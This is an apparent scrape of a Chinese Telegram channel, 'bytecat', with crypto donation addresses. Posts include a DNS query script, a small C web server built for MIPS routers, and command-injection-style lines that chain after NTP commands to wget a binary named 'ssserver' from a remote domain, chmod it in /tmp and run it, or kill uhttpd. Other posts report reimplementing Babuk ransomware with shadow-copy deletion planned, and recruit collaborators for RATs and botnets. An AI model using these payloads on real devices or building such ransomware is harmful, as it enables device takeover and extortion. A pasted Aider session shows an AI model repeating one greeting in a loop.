bytecat
66 subscribers
4 photos
6 videos
6 files
41 links
USDT Tron:
TV7xutPgpSP1wQWF66ppiazZX7yJ5424JX
LTC: ltc1qfwg0lpv2taaa9z7ek73hwxldsj97zj7duplfrp
Session: 05be77963b5a305065d3a109e00aeaf98e6640e82c1973a92073ec762e8506ae35
The atmosphere in the associated group is sheer chaos.
Download Telegram
import socket
def q(d):
e = b'\x12\x34'
"""
A 16 bit identifier assigned by the program
程序分配的16位标识符
that generates any kind of query
This identifier is copied
the corresponding reply and can be used by the requester
to match replies to outstanding queries
RFC1035 section4.1.1
nslookup程序出自Debian软件包bind9-dnsutils
它的可执行文件路径是/usr/bin/nslookup
它的源代码文件路径是/bin/dig/nslookup.c(这是gitlab的路径)
在其中搜索字符串uint16(_t) 只有一个端口变量 所以我跳过了
port = (uint16_t)n
过了一年(度秒如年) 我注意到/usr/lib/x86_64-linux-gnu目录下有libdns-9.20.9-1-Debian.so文件
以及libisc-9.20.9-1-Debian.so文件
它们在gitlab上的路径分别为/lib/dns和/lib/isc/
文件分别为dispatch.c和random.c
在dispatch.c中搜索id 第4个在第98行
dns_messageid_t id;
但它还不是 继续搜索dns_messageid
第4个在第1416行
...
总之我认为它要么是指针idp所指向的值
要么是isc_random16()的返回值
resp->id = ((options & DNS_DISPATCHOPT_FIXEDID) != 0)
? *idp
: (dns_messageid_t)isc_random16()
如上
所以现在我可以在random.c中搜索isc_random16
isc_random16(void) {
isc__random_initialize();
return (uint16_t)next();
}
返回值是uint16_t类型的 而next不与说明
"""
h = b'\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00'
y = b''
for p in d.split('.'):
y += bytes([len(p)])+p.encode('utf-8')
y += b'\x00'
y += b'\x00\x01'
y += b'\x00\x01'
pkt = e + h + y
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(pkt, ('127.0.0.1', 53))
r=s.recvfrom(512)[0]
s.close()
b = r[slice(-4,None)]
return '.'.join(str(x) for x in b)
if __name__ == '__main__':
IP = q('bytecategory.com')
print(f"bytecategory.com\t{IP}")
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
int main() {
int f, d;
struct sockaddr_in v, c;
socklen_t client_len = sizeof(c);
char b[1024];
f = socket(AF_INET, SOCK_STREAM, 0);
int p = 1;
setsockp(f, SOL_SOCKET, SO_REUSEADDR, &p, sizeof(p));
memset(&v, 0, sizeof(v));
v.sin_family = AF_INET;
v.sin_addr.s_addr = INADDR_ANY;
v.sin_port = htons(80);
bind(f, (struct sockaddr *)&v, sizeof(v));
listen(f, 3);
daemon(1, 1);
while (1) {
if ((d = accept(f, (struct sockaddr *)&c, &client_len)) < 0) {
continue;
}
int s = read(d, b, 1024);
if (s < 0) {
close(d);
continue;
}
const char *r = "HTTP/1.1 200 OK\r\n\r\n<p style='text-align: center;color: pink;font-size: 24px'>cyw,&#x6211;&#x559C;&#x6B22;&#x4F60;</p>";
send(d, r, strlen(r), 0);
close(d);
}
close(f);
return 0;
}

mips-linux-gnu-gcc -march=mips2 -EB -mtune=mips2 -mabi=32 -mhard-float -static -O0 -o E E.c
-497714339 To 93[.]123[.]85[.]226
print(
'''\033 //
\\\\ //
\\\\ //
##DDDDDDDDDDDDDDDDDDDDDD##
## DDDDDDDDDDDDDDDDDDDD ## ________ ___ ___ ___ ________ ___ ___ ___
## hh hh ## |\\ __ \\ |\\ \\ |\\ \\ |\\ \\ |\\ __ \\ |\\ \\ |\\ \\ |\\ \\
## hh // \\\\ hh ## \\ \\ \\|\\ /_\\ \\ \\\\ \\ \\ \\ \\ \\\\ \\ \\|\\ /_\\ \\ \\\\ \\ \\ \\ \\ \\
## hh // \\\\ hh ## \\ \\ __ \\\\ \\ \\\\ \\ \\ \\ \\ \\\\ \\ __ \\\\ \\ \\\\ \\ \\ \\ \\ \\
## hh hh ## \\ \\ \\|\\ \\\\ \\ \\\\ \\ \\____ \\ \\ \\\\ \\ \\|\\ \\\\ \\ \\\\ \\ \\____ \\ \\ \\
## hh wwww hh ## \\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\
## hh hh ## \\|_______| \\|__| \\|_______| \\|__| \\|_______| \\|__| \\|_______| \\|__|
## MMMMMMMMMMMMMMMMMMMM ##
##MMMMMMMMMMMMMMMMMMMMMM##
\\/ \\/
\033''',
end='')
msntp -V -c 1 -r time[.]nist[.]gov&cd /tmp;chmod +x ./ssserver;./ssserver | dd of=.txt > /dev/null
/bin/sh -c ntpd -dnqp time[.]nist[.]gov;cd /zconf;sleep 114514;wget bytecategory[.]com/ssserver > /dev/null
killall uhttpd;rpcapd -p 80 -d
安全研究员在Microsoft Defender中发现漏洞 与微软产生矛盾后公开漏洞(作者:匿名)

研究人员在 Microsoft Defender 中发现安全漏洞,可以借助这款系统级安全软件本身进行权限提升。但研究人员与 MSRC 团队之间出现矛盾,这导致研究人员直接公布漏洞,漏洞公布后已经有黑客开始尝试利用漏洞发起攻击 --- 利用 Defender 作为提权跳板。
需要注意的是 这个安全研究员不是我
新闻: emptiness 作者删除了他的Telegram 账户
我终于搞明白了babuk 并用Python复现了 下一步是换成C++ 并且删除卷影 遍历本地磁盘和网络磁盘
360解密大师是无法解密的 只要我保管好了我的私钥
Forwarded from 科技圈🎗在花频道📮
国产主流杀毒软件内核驱动曝高危漏洞

安全研究员 Patrick Saif 披露金山毒霸与 360安全卫士的内核驱动存在高危漏洞。金山毒霸防火墙驱动因 IOCTL 尺寸计算错误引发内核堆溢出,攻击者无需认证即可破坏内核池元数据,实现任意代码执行。360安全卫士反 Rootkit 驱动风险更高,其签名校验可通过进程空洞绕过,硬编码的 AES 密钥允许攻击者执行任意内核读写及终止受 PPL 保护的进程。两者均持有合法数字签名,极易被用于 BYOVD 攻击。

目前两个漏洞已提交至 LOLDrivers 数据库,均未获 CVE 编号且不在 HVCI 屏蔽名单中。攻击者利用这些漏洞可从普通用户提权至 SYSTEM,绕过 KASLR 并窃取内核凭据,甚至修改内核回调表隐藏恶意行为。鉴于涉事驱动具备 EV 或 WHQL 签名,攻击者无需在目标机器安装软件即可加载恶意载荷。在厂商发布补丁前,企业需将相关驱动哈希加入 EDR 检测规则以防范内核级攻击。

weezerOSINT | Github(1,2)

🌸 在花频道茶馆讨论投稿通道
C:\Windows\System32>aider --model openrouter/x-ai/grok-4.20-multi-agent
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Aider v0.86.2
Model: openrouter/x-ai/grok-4.20-multi-agent with whole edit format
Git repo: none
Repo-map: disabled
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
> hello

你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
供需要修改的代码内容以及你想要做的更改(例如“将问候语改得更随意”),这样我才能理解请求并按照要求输出文件修改。如果只是
打招呼,请告诉我下一步需要做什么。
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提


Tokens: 607 sent, 127 received. Cost: $0.0020 message, $0.0020 session.
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>
太拼了 为了耗我的money这么玩是吧
要合作rat,botnet的加群并私信
最近Vless-Cracker倒计时三天 我也来个.